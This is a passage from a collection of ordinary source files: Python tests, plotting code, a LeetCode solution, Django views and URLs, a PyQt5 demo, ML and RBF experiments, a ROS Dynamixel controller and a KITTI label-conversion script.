test_roll_draw(capfd, player1, player2, rolls):\n capfd.readouterr()\n p1_roll = rolls[0]\n p2_roll = rolls[0]\n program.check_result(p1_roll, p2_roll, player1, player2)\n\n out, _ = capfd.readouterr()\n out = out.rstrip().split('\\n')\n # Good\n assert out[0] == '{} roll: {} - {} roll : {}'.format(\n player1.name, p1_roll.name, player2.name, p2_roll.name\n )\n # Good\n assert out[1] == 'Same roll'\n\n\ndef test_roll_win(capfd, player1, player2, rolls):\n capfd.readouterr()\n p1_roll = rolls[0]\n p2_roll = rolls[1]\n program.check_result(p1_roll, p2_roll, player1, player2)\n\n out, _ = capfd.readouterr()\n out = out.rstrip().split('\\n')\n # Good\n assert out[0] == '{} roll: {} - {} roll : {}'.format(\n player1.name, p1_roll.name, player2.name, p2_roll.name\n )\n # Good\n assert out[1] == '{} won. He have now {} points'.format(\n player1.name, player1.points\n )\n\n\ndef test_roll_lose(capfd, player1, player2, rolls):\n capfd.readouterr()\n p1_roll = rolls[1]\n p2_roll = rolls[0]\n program.check_result(p1_roll, p2_roll, player1, player2)\n\n out, _ = capfd.readouterr()\n out = out.rstrip().split('\\n')\n # Good\n assert out[0] == '{} roll: {} - {} roll : {}'.format(\n player1.name, p1_roll.name, player2.name, p2_roll.name\n )\n # Good\n assert out[1] == '{} won. He have now {} points'.format(\n player2.name, player2.points\n )\n","sub_path":"TalkPython/49/15/test_program.py","file_name":"test_program.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384926307","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\nfrom vfr.db.retrieval import get_data\n\nimport numpy as np\nimport types\nimport logging\n\n# import matplotlib.pyplot as plt\n\n# import numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom Gearbox.gear_correction import fit_gearbox_correction\n\nfrom Gearbox.plot_gear_correction import (\n plot_gearbox_calibration,\n plot_correction,\n plot_measured_vs_expected_points,\n CALIBRATION_PLOTSET,\n PLOT_FIT,\n PLOT_CORR,\n PLOT_CAL_DEFAULT,\n PLOT_CAL_ALL,\n)\n\n\ndef plot_pos_rep(fpu_id, analysis_results_alpha, analysis_results_beta, opts):\n if opts.blob_type == \"large\":\n blob_idx = slice(3, 5)\n else:\n blob_idx = slice(0, 2)\n\n colorcode = [\"blue\", \"red\", \"green\", \"cyan\"]\n for label, series, sweeps in [\n (\"alpha arm\", analysis_results_alpha, [0, 1]),\n (\"beta arm\", analysis_results_beta, [2, 3]),\n ]:\n\n if series is None:\n print(\"no data found for FPU %s, %s\" % (fpu_id, label))\n continue\n\n fig, ax = plt.subplots()\n\n for sweep_idx in sweeps:\n direction = \"up\" if sweep_idx in [0, 2] else \"down\"\n\n color = colorcode[sweep_idx]\n sweep_series = [v for k, v in series.items() if (k[3] == sweep_idx)]\n x, y = np.array(sweep_series).T[blob_idx]\n ax.scatter(\n x,\n -y,\n c=color,\n label=\"%s %s\" % (label, direction),\n alpha=0.7,\n edgecolors=\"none\",\n )\n\n ax.legend()\n ax.grid(True)\n plt.xlabel(\"x [millimeter], Cartesian camera coordinates\")\n plt.ylabel(\"y [millimeter], Cartesian camera coordinates\")\n plt.title(\"%s plot B: positional repeatability\" % fpu_id)\n\n plt.show()\n\n\ndef plot_dat_rep(fpu_id, datumed_coords, moved_coords, opts):\n if opts.blob_type == \"large\":\n blob_idx = slice(3, 5)\n else:\n blob_idx = slice(0, 2)\n\n fig, ax = plt.subplots()\n for label, series, color in [\n (\"datum only\", datumed_coords, \"red\"),\n (\"moved + datumed\", moved_coords, \"blue\"),\n ]:\n\n if series is None:\n print(\"no data found for FPU %s, %s\" % (fpu_id, label))\n continue\n\n coords = np.array(series).T\n coords_zeroed = coords - np.mean(coords, axis=1)[:, np.newaxis]\n x, y = coords_zeroed[blob_idx]\n ax.scatter(x, y, c=color, label=label, alpha=0.7, edgecolors=\"none\")\n\n ax.legend()\n\n ax.grid(True)\n plt.xlabel(\"x [millimeter], Cartesian camera coordinates\")\n plt.ylabel(\"y [millimeter], Cartesian camera coordinates\")\n plt.title(\"%s plot A: datum repeatability\" % fpu_id)\n\n plt.show()\n\n\nPLOT_DEFAULT_SELECTION = PLOT_CAL_DEFAULT | set(\"ABR\")\nPLOT_ALL = set(\"ABR\") | PLOT_CAL_ALL\n\ndef plot_pos_ver(fpu_id, pos_ver_result, pos_rep_result, opts):\n logger = logging.getLogger(__name__)\n\n measured_points = pos_ver_result[\"measured_points\"]\n if not measured_points:\n logger.info(\"FPU {}: no data for plotting pos-ver result - skipped\".format(fpu_id))\n return\n\n eval_version = pos_ver_result[\"evaluation_version\"]\n if eval_version < (1, 0, 0):\n logger.info(\"FPU {:s}: positional verification data evaluation \"\n \"version is too old ({:s}) - plot skipped.\".format(fpu_id, eval_version))\n return\n\n if pos_rep_result is None:\n logger.info(\"FPU {:s}: positional repeatability data\"\n \" is missing, plot skipped.\".format(fpu_id))\n return\n\n x_center = pos_rep_result[\"gearbox_correction\"][\"x_center\"]\n y_center = pos_rep_result[\"gearbox_correction\"][\"y_center\"]\n\n\n x_measured, y_measured = np.array(measured_points.values()).T\n\n expected_points = pos_ver_result[\"expected_points\"]\n x_expected, y_expected = np.array(expected_points.values()).T\n\n plt.plot([x_center], [y_center], \"mD\", label=\"alpha arm center point\")\n error_95_percentile_micron = pos_ver_result[\"posver_error_measures\"].percentiles[95] * 1000\n plt.plot(x_measured, y_measured, \"r.\", label=\"measured points, 95 % percentile =\"\n \" {:5.0f} $\\mu$m\".format(error_95_percentile_micron)\n # \" {posver_error_measures.percentiles[95]:8.4f}\".format(**pos_ver_result)\n )\n plt.plot(x_expected, y_expected, \"b+\", label=\"expected points\")\n plt.legend(loc=\"best\", labelspacing=0.1)\n plt.grid()\n plt.title(\"FPU {} plot R: positional verification -- measured and expected points\".format(fpu_id))\n plt.xlabel(\"x [millimeter], Cartesian camera coordinates\")\n plt.ylabel(\"y [millimeter], Cartesian camera coordinates\")\n plt.show()\n\n\ndef plot(dbe, opts):\n logger = logging.getLogger(__name__)\n\n plot_selection = dbe.opts.plot_selection\n for count, fpu_id in enumerate(dbe.eval_fpuset):\n ddict = vars(get_data(dbe, fpu_id))\n if ddict is None:\n logger.info(\"FPU %r: no plot data found\" % fpu_id)\n continue\n if plot_selection == \"*\":\n plot_selection = PLOT_ALL\n else:\n plot_selection = set(plot_selection)\n\n if type(fpu_id) == types.IntType:\n fpu_id = dbe.fpu_config[fpu_id][\"serialnumber\"]\n\n if \"A\" in plot_selection:\n if ddict[\"datum_repeatability_result\"] is None:\n logger.info(\n \"FPU %r: no plot data for datum repeatability found\" % fpu_id\n )\n else:\n dat_rep_result = ddict[\"datum_repeatability_result\"][\"coords\"]\n coords_datumed = dat_rep_result[\"datumed_coords\"]\n coords_moved = dat_rep_result[\"moved_coords\"]\n\n plot_dat_rep(fpu_id, coords_datumed, coords_moved, opts)\n\n if ddict[\"positional_repeatability_result\"] is None:\n logger.info(\n \"FPU %r: no plot data for positional repeatability found\" % fpu_id\n )\n continue\n\n if \"B\" in plot_selection:\n pos_rep_result = ddict[\"positional_repeatability_result\"]\n result_alpha = pos_rep_result[\"analysis_results_alpha\"]\n result_beta = pos_rep_result[\"analysis_results_beta\"]\n\n plot_pos_rep(fpu_id, result_alpha, result_beta, opts)\n\n if (CALIBRATION_PLOTSET | set(PLOT_FIT)) & plot_selection:\n pos_rep_result = ddict[\"positional_repeatability_result\"]\n result_alpha = pos_rep_result[\"analysis_results_alpha\"]\n result_beta = pos_rep_result[\"analysis_results_beta\"]\n\n gear_correction = fit_gearbox_correction(\n fpu_id, result_alpha, result_beta, return_intermediate_results=True\n )\n fit_alpha = gear_correction[\"coeffs\"][\"coeffs_alpha\"]\n if CALIBRATION_PLOTSET & plot_selection:\n if fit_alpha is None:\n print(\"no parameters found for FPU %s, %s arm\" % (fpu_id, \"alpha\"))\n else:\n plot_gearbox_calibration(\n fpu_id, \"alpha\", plot_selection=plot_selection, **fit_alpha\n )\n\n if PLOT_CORR in plot_selection:\n plot_correction(fpu_id, \"alpha\", **fit_alpha)\n\n fit_beta = gear_correction[\"coeffs\"][\"coeffs_beta\"]\n if CALIBRATION_PLOTSET & plot_selection:\n if fit_beta is None:\n print(\"no parameters found for FPU %s, %s arm\" % (fpu_id, \"beta\"))\n else:\n plot_gearbox_calibration(\n fpu_id, \"beta\", plot_selection=plot_selection, **fit_beta\n )\n if PLOT_CORR in plot_selection:\n plot_correction(fpu_id, \"beta\", **fit_beta)\n\n if PLOT_FIT in plot_selection:\n plot_measured_vs_expected_points(fpu_id, **gear_correction)\n\n if \"R\" in plot_selection:\n pos_ver_result = ddict[\"positional_verification_result\"]\n pos_rep_result = ddict[\"positional_repeatability_result\"]\n\n if pos_ver_result is not None:\n plot_pos_ver(fpu_id, pos_ver_result, pos_rep_result, opts)\n","sub_path":"vfr/output/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":8236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615651327","text":"class Solution:\n \"\"\"\n Problem : 735\n Name : Shahreen Shahjahan Psyche\n Time : O(N)\n Space : O(N) [It could be O(1) if I dont count my output array as an auxiliary array]\n \n Passed All Test Cases in LC : Yes\n \n Approach : # Initialize a stack\n # Start pushing the asteroids until we get 2 asteroids are approaching towards each other. Which meeans, current one should be -ve\n and previous one should be +ve\n # Now, if there is a collision, then we start popping out the asteroids from stack until we get a smaller or equal magnituted's +ve asteroids\n or the stack is empty\n # After popping all of them, if the asteroid does not encounter an equal positive asteroid or greater than that, it will get pushed back to stack\n # At the end, return the stack\n \n \n \"\"\"\n def asteroidCollision(self, asteroids: List[int]) -> List[int]:\n \n if not asteroids:\n return []\n \n track = []\n \n for i in range(len(asteroids)):\n # when the stack is empty, just pushing the current value\n if len(track) == 0:\n track.append(asteroids[i])\n else:\n # if my current asteeroid is -ve and the stack top is +ve, that means they are moving towards each other and theeir will be collision\n if asteroids[i] < 0 and track[-1] > 0:\n flag = False\n curr = -1\n # eliminating all the astoroids that are less or equal magnitudee than the current asteroid\n while len(track) != 0 and abs(asteroids[i]) >= track[-1] and track[-1] > 0:\n curr = track.pop()\n # if the popped value is equal to the magnitude of the current one, then making the flag True and breaking loop\n if curr == abs(asteroids[i]):\n flag = True\n break\n # cheecking whether current asteroid satisfies to push back in the stack\n if (len(track) == 0 and flag == False) or (len(track) != 0 and track[-1] < 0 and flag == False):\n track.append(asteroids[i]) \n # if the astoroids are not coming towards each other, then nothing can be done. So we push the astoroids to the stack\n else:\n track.append(asteroids[i])\n \n return track\n \n \n","sub_path":"AsteroidCollision.py","file_name":"AsteroidCollision.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"331937665","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.task_list, name = 'task_list'),\n path('completed_tasks/', views.completed_tasks, name = 'completed_tasks'),\n path('/remove', views.task_remove, name = 'task_remove'),\n path('/complete', views.task_complete, name = 'task_complete'),\n path('/restore', views.task_restore, name = 'task_restore'),\n path('/copy', views.task_copy, name = 'task_copy'),\n path('/edit', views.task_edit, name = 'task_edit'),\n path('list_list/', views.ListListView.as_view(), name = \"list_list\"),\n path('removed_lists/', views.removed_lists, name = 'removed_lists'),\n path('/list_remove/', views.list_remove, name = 'list_remove'),\n path('/list_delete/', views.list_delete, name = 'list_delete'),\n path('/list_restore/', views.list_restore, name = 'list_restore'),\n path('new/', views.list_new, name = 'list_new'),\n path('/list_edit/', views.list_edit, name='list_edit'),\n path('/detail/', views.list_detail, name='list_detail'),\n path('all_lists_delete/', views.all_lists_delete, name='all_lists_delete'),\n path('create_list/', views.create_list, name='create_list'),\n\n]","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"172100036","text":"import sys\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QPixmap, QPalette\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QLabel, QWidget\n\n\nclass QLabelDemo(QWidget):\n\n def __init__(self):\n super().__init__()\n self.setGeometry(300, 300, 500, 500)\n self.init()\n\n def init(self):\n label1 = QLabel(self)\n label2 = QLabel(self)\n label3 = QLabel(self)\n label4 = QLabel(self)\n\n label1.setText(' this is a text label. ')\n label1.setAutoFillBackground(True)\n palette = QPalette()\n palette.setColor(QPalette.Window, Qt.blue)\n label1.setPalette(palette)\n label1.setAlignment(Qt.AlignCenter)\n\n label2.setText(\"welcome to use python gui application\")\n\n label3.setAlignment(Qt.AlignLeft)\n label3.setToolTip('this is a image label')\n label3.setPixmap(QPixmap('Screenshot_20191015_190344.png'))\n\n label4.setOpenExternalLinks(True)\n label4.setText(\" welcome to use baidu.com \")\n label4.setAlignment(Qt.AlignRight)\n label4.setToolTip(\"this is a super link\")\n\n v_box = QVBoxLayout()\n v_box.addWidget(label1)\n v_box.addWidget(label2)\n v_box.addWidget(label3)\n v_box.addWidget(label4)\n\n label2.linkHovered.connect(self.linkhovered)\n label3.linkActivated.connect(self.linkclicked)\n\n self.setLayout(v_box)\n self.setWindowTitle('QLabel Demo')\n\n def linkhovered(self):\n print(\"when mouse skip the label2\")\n\n def linkclicked(self):\n print(\"when mouse click the label3\")\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = QLabelDemo()\n main.show()\n sys.exit(app.exec_())\n","sub_path":"src/qLabel.py","file_name":"qLabel.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336803132","text":"from quick_sort import quick_sort\nfrom quick_sort import choose_pivot_median,get_number_of_comparisons\n\n\nimport unittest\n\nclass QuickSortTest(unittest.TestCase):\n\n def totally_unordered_test(self):\n test_case = [9,8,7,6,5,4,3,2,1,0]\n ordered = [0,1,2,3,4,5,6,7,8,9]\n quick_sort(test_case)\n self.assertEqual(ordered,test_case,\"Array not sorted\") \n\n def ordered_test(self):\n test_case = [0,1,2,3,4,5,6,7,8,9]\n ordered = [0,1,2,3,4,5,6,7,8,9]\n quick_sort(test_case)\n self.assertEqual(ordered,test_case,\"Array not sorted\") \n\n def partially_ordered_test(self):\n test_case = [5,6,7,8,9,0,1,2,3,4]\n ordered = [0,1,2,3,4,5,6,7,8,9]\n quick_sort(test_case)\n self.assertEqual(ordered,test_case,\"Array not sorted\") \n\n def test_order_median_method(self):\n test_case = [2, 20, 1, 15, 3, 11, 13, 6, 16, 10, 19, 5, 4, 9, 8, 14, 18, 17, 7, 12] \n\n ordered = [2, 20, 1, 15, 3, 11, 13, 6, 16, 10, 19, 5, 4, 9, 8, 14, 18, 17, 7, 12]\n ordered.sort()\n true_count_number = 55\n test_count_number = quick_sort(test_case,pivot_method=\"median\")\n\n self.assertEqual(ordered,test_case,\"Array not sorted\") \n self.assertEqual(true_count_number,test_count_number,\"Wrong number of counts: {}\".format(test_count_number)) \n\n def test_median_pivot_method(self):\n \n test_single_median_pivot(self,[2, 20, 1, 15, 3, 11, 13, 6, 16, 10, 19, 5, 4, 9, 8, 14, 18, 17, 7, 12],10 ) \n test_single_median_pivot(self,[7, 1, 3, 6, 2, 5, 4, 9, 8] ,7 ) \n test_single_median_pivot(self,[4, 1, 3, 6, 2, 5] ,4 ) \n test_single_median_pivot(self,[2, 1, 3], 2) \n test_single_median_pivot(self,[6, 5] , 6) \n \n def test_get_number_of_comparisons(self):\n pass\n\ndef test_single_median_pivot(test,test_case,correct_median):\n\n median_index = choose_pivot_median(test_case,0,len(test_case)-1)\n median_test = test_case[median_index]\n\n test.assertEqual(correct_median,median_test,\"Wrong median: {}\".format(median_test)) \n \n \n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"divide_and_conquer/week3/quicksort/quick_sort_test.py","file_name":"quick_sort_test.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"607493479","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 23 12:47:30 2018\n\n@author: emrecemaksu\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\nveriler = pd.read_csv('veriler.csv')\nX = veriler.iloc[:,1:4]\ny = veriler.iloc[:,4:]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=1)\n\nsc = StandardScaler()\nX_SC_train = sc.fit_transform(X_train)\nX_SC_test = sc.fit_transform(X_test)\n\nLOGR = LogisticRegression(random_state=0)\nLOGR.fit(X_SC_train, y_train)\nLOGR_predict = LOGR.predict(X_SC_test)\nprint(LOGR_predict)\nprint(y_test)\n\ncm = confusion_matrix(y_test, LOGR_predict)\nprint(cm)\n\nknn = KNeighborsClassifier(n_neighbors=1, metric='minkowski')\nknn.fit(X_SC_train, y_train)\nknn_pred = knn.predict(X_SC_test)\nprint(knn_pred)\nprint(y_test)\ncm2 = confusion_matrix(y_test, knn_pred)\nprint(cm2)\n","sub_path":"LogisticRegression/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"28083178","text":"# -*- coding: utf-8 -*-\n#\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2015, Krit Chaiso.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of University of Arizona nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom __future__ import division\n\n\n__author__ = 'Krit Chaiso'\n__copyright__ = 'Copyright (c) 2015 Krit Chaiso'\n__credits__ = 'Cara Slutter & Antons Rebguns'\n\n__license__ = 'BSD'\n__maintainer__ = 'Krit Chaiso'\n__email__ = 'krit.c@ku.th'\n\nimport rospy\nfrom dynamixel_controllers.joint_position_controller import JointPositionController\n\n\nclass JointPositionLumyai(JointPositionController):\n def __init__(self, dxl_io, controller_namespace, port_namespace):\n JointPositionController.__init__(self, dxl_io, controller_namespace, port_namespace)\n\n self.actual_encoder_resolution = rospy.get_param(self.controller_namespace + '/actual_encoder_resolution')\n self.range_radians = rospy.get_param('dynamixel/%s/%d/range_radians' % (self.port_namespace, self.motor_id))\n\n def pos_rad_to_raw(self, pos_rad):\n if pos_rad < self.min_angle: pos_rad = self.min_angle\n elif pos_rad > self.max_angle: pos_rad = self.max_angle\n pos_raw = self.rad_to_raw(pos_rad, self.initial_position_raw, self.flipped, self.actual_encoder_resolution/self.range_radians)\n return int(pos_raw * self.ENCODER_RESOLUTION/self.actual_encoder_resolution)\n\n","sub_path":"src/hardware_bridge/joint_position_lumyai.py","file_name":"joint_position_lumyai.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"70455398","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n# @author : 郑祥忠\n# @license : (C) Copyright,2013-2020,广州海格星航科技\n# @contact : dylenzheng@gmail.com\n# @file : modify_annotations_txt.py\n# @time : 4/13/20 5:19 PM\n# @desc : \n'''\n\nimport glob\nimport os\ntxt_list = glob.glob(\"/home/zhex/backup/kitti2/training/label_2/*.txt\") # 存储labels文件夹所有txt文件路径\n\ndef show_category(txt_list):\n category_list= []\n for item in txt_list:\n try:\n with open(item) as tdf:\n for each_line in tdf:\n labeldata = each_line.strip().split(' ') # 去掉前后多余的字符并把其分开\n category_list.append(labeldata[0]) # 只要第一个字段,即类别\n except IOError as ioerr:\n print('File error:'+str(ioerr))\n print(set(category_list)) # 输出集合\n\ndef merge(line):\n each_line=''\n for i in range(len(line)):\n if i!= (len(line)-1):\n each_line=each_line+line[i]+' '\n else:\n each_line=each_line+line[i] # 最后一条字段后面不加空格\n each_line=each_line+'\\n'\n return (each_line)\n\ndef merge_index(line):\n each_line=''\n for i in range(len(line)):\n if i!= (len(line)-1):\n each_line=each_line+line[i]+' '\n else:\n each_line=each_line+line[i] # 最后一条字段后面不加空格\n each_line=each_line+'\\n'\n return (each_line)\n\nprint('before modify categories are:\\n')\nshow_category(txt_list)\n\nfor item in txt_list:\n new_txt=[]\n try:\n with open(item, 'r') as r_tdf:\n for each_line in r_tdf:\n labeldata = each_line.strip().split(' ')\n\n # if labeldata[0] in ['Truck','Van','Tram']: # 合并汽车类\n if labeldata[0] in ['Car','Van','Tram','Truck']: # 合并汽车类为vehicle类别\n labeldata[0] = labeldata[0].replace(labeldata[0],'vehicle')\n\n # if labeldata[0] == 'Person_sitting': # 合并行人类\n # labeldata[0] = labeldata[0].replace(labeldata[0],'Pedestrian')\n\n if labeldata[0] in ['Person_sitting','Pedestrian','Cyclist']:\n continue\n\n if labeldata[0] == 'DontCare': # 忽略Dontcare类\n continue\n\n if labeldata[0] == 'Misc': # 忽略Misc类\n continue\n new_txt.append(merge_index(labeldata)) # 重新写入新的txt文件\n\n\n with open(item,'w+') as w_tdf: # w+是打开原文件将内容删除,另写新内容进去\n for temp in new_txt:\n w_tdf.write(temp)\n\n\n\n except IOError as ioerr:\n print('File error:'+str(ioerr))\nprint('\\nafter modify categories are:\\n')\nshow_category(txt_list)\n","sub_path":"bdd_kitti/kitti/modify_annotations_txt.py","file_name":"modify_annotations_txt.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508179676","text":"import numpy as np\nimport sklearn\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom scipy.interpolate import Rbf\nimport matplotlib.pyplot as plt\n\nimport my_tf_pkg as mtf\n\n## Data sets\ndef get_kernel_matrix(x,W,S):\n beta = get_beta_np(S)\n Z = -beta*euclidean_distances(X=x,Y=W,squared=True)\n K = np.exp(Z)\n return K\n\n# def get_index():\n# index = []\n# for i, center in enumerate(nb_centers):\n# target_center\n# if target_center == center:\n#\n\nN = 60000\nlow_x =-2*np.pi\nhigh_x=2*np.pi\nX = low_x + (high_x - low_x) * np.random.rand(N,1)\nX_test = low_x + (high_x - low_x) * np.random.rand(N,1)\n# f(x) = 2*(2(cos(x)^2 - 1)^2 -1\nf = lambda x: 2*np.power( 2*np.power( np.cos(x) ,2) - 1, 2) - 1\nY = f(X)\nY_test = f(X_test)\n\n#stddev = 1\nstddev = 1.8\nreplace = False # with or without replacement\nnb_centers_reconstruct = [6, 12, 24, 36, 48] # number of centers for RBF\nnb_centers = [3, 6, 9, 12, 16, 24, 30, 39, 48, 55]\nnb_centers = range(2,25)\ncolours = ['g','r','c','m','y']\n#\nrbf_predictions_reconstruct_train = []\nrbf_predictions_reconstruct_test = []\n\n#rbf_predictions_test = []\nrbf_errors_test = []\n\n#rbf_predictions_train = []\nrbf_errors_train = []\nfor K in nb_centers:\n indices=np.random.choice(a=N,size=K,replace=replace) # choose numbers from 0 to D^(1)\n subsampled_data_points=X[indices,:] # M_sub x D\n\n beta = np.power(1.0/stddev,2)\n Kern = np.exp(-beta*euclidean_distances(X=X,Y=subsampled_data_points,squared=True)) # N_train x D^1\n (C,_,_,_) = np.linalg.lstsq(Kern,Y)\n\n #indices=np.random.choice(a=N,size=K,replace=replace) # choose numbers from 0 to D^(1)\n #subsampled_data_points=X_test[indices,:] # M_sub x D\n Kern_test = np.exp(-beta*euclidean_distances(X=X_test,Y=subsampled_data_points,squared=True)) # N_test x D^1\n\n Y_pred = np.dot( Kern , C )\n Y_pred_test = np.dot( Kern_test , C )\n\n #rbf_predictions_train.append(Y_pred)\n train_error = sklearn.metrics.mean_squared_error(Y, Y_pred)\n rbf_errors_train.append(train_error)\n #rbf_predictions_test.append(Y_pred_test)\n test_error = sklearn.metrics.mean_squared_error(Y_test, Y_pred_test)\n rbf_errors_test.append(test_error)\n if K in nb_centers_reconstruct:\n rbf_predictions_reconstruct_train.append(Y_pred)\n rbf_predictions_reconstruct_test.append(Y_pred_test)\n\ndef plot_reconstruction(fig_num, X_original,Y_original, nb_centers, rbf_predictions, colours, markersize=3, title_name='Reconstruction'):\n fig = plt.figure(fig_num)\n plt.xlabel('number of centers')\n plt.ylabel('Reconstruction')\n plt.title(title_name)\n plt.plot(X_original, Y_original,'bo', label='Original data', markersize=markersize)\n for i, Y_pred in enumerate(rbf_predictions):\n colour = colours[i]\n K = nb_centers[i]\n plt.plot(X_original, Y_pred, colour+'o', label='RBF'+str(K), markersize=markersize)\n\ndef plot_errors(nb_centers, rbf_errors,label='Errors', markersize=3, colour='b'):\n plt.xlabel('number of centers')\n plt.ylabel('squared error (l2 loss)')\n plt.plot(nb_centers, rbf_errors, colour, label=label, markersize=3)\n plt.plot(nb_centers, rbf_errors, colour+'o')\n\nplot_reconstruction(fig_num=1, X_original=X,Y_original=Y, nb_centers=nb_centers_reconstruct, rbf_predictions=rbf_predictions_reconstruct_train, colours=colours, markersize=3,title_name='Reconstruction_train')\nplot_reconstruction(fig_num=2, X_original=X_test,Y_original=Y_test, nb_centers=nb_centers_reconstruct, \\\n rbf_predictions=rbf_predictions_reconstruct_test, colours=colours, markersize=3,title_name='Reconstruction_test')\nplt.figure(3)\nplot_errors(nb_centers, rbf_errors_train,label='train_Errors', markersize=3,colour='b')\nplot_errors(nb_centers, rbf_errors_test,label='test_Errors', markersize=3,colour='r')\n#\nplt.legend()\nplt.show()\n","sub_path":"other/tf_experiments_scripts_with_mistake/old_files/krls_so.py","file_name":"krls_so.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"403087239","text":"import django.contrib.auth as auth\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.conf import settings\nfrom django.contrib.formtools.wizard.views import SessionWizardView\nimport os\nfrom datetime import date, timedelta\nfrom django.contrib import messages\nfrom opticon.globalstrings import Globalstrings\nfrom opticon.globalvars import Globalvars\n\nfrom opticon.utils import get_employee_list\nfrom core.forms import AssignEmployeesForm, InviteSubcontractorForm, OrdernumberForm, InvitationTransferForm\nfrom core.models import Order, OrderInvitation, OrderManager, SiteDocuments\nfrom django.forms.formsets import formset_factory\nfrom django.http.response import HttpResponseForbidden, Http404\nfrom collections import OrderedDict\nimport datetime\n\n@login_required\ndef invitation(request, invitation_id):\n\tgs = Globalstrings()\n\tgv = Globalvars()\n\tinvitation = OrderInvitation.objects.get(id=invitation_id)\n\torder_from = Order.objects.get(id=invitation.order_from_id)\n\tdecline = None\n\n\tif invitation.invitation_created <= gv.invitation_expired:\n\t\treturn redirect('core:invitation_expired', invitation_id)\n\t\n\tif request.method == 'POST':\n\t\tif gs.decline in request.POST:\n\t\t\tsetattr(invitation, 'order_accepted', 'D')\n\t\t\tsetattr(invitation, 'invitation_declined', datetime.date.today())\n\t\t\tinvitation.save()\n\t\t\treturn redirect('core:dashboard')\n\t\telif gs.accept in request.POST:\n\t\t\treturn redirect('/invitation/' + str(invitation_id) + '/wizard/')\n\t\t\t\n\treturn render(\n\t\trequest, \n\t\t'core/invitation.html',\n\t\t{\n\t\t\t'invitation': invitation,\n\t\t\t'order': order_from,\n\t\t\t'headline': gs.accept_site,\n\t\t\t'cancel_text': gs.cancel,\n\t\t\t'invite_text': gs.invite_text.format(order_from.company, order_from.site),\n\t\t\t'accept_text': gs.accept,\n\t\t\t'decline_text': gs.decline,\n\t\t\t'decline': decline,\n\t\t}\n\t)\n\n@login_required\ndef invitation_expired(request, invitation_id):\n\tinvitation = OrderInvitation.objects.get(id=invitation_id)\n\torder_from = Order.objects.get(id=invitation.order_from_id)\n\tgs = Globalstrings()\n\n\tif request.method == 'POST':\n\t\tif gs.remove in request.POST:\n\t\t\tsetattr(invitation, 'order_accepted', 'D')\n\t\t\tsetattr(invitation, 'invitation_declined', datetime.date.today())\n\t\t\tinvitation.save()\n\t\t\treturn 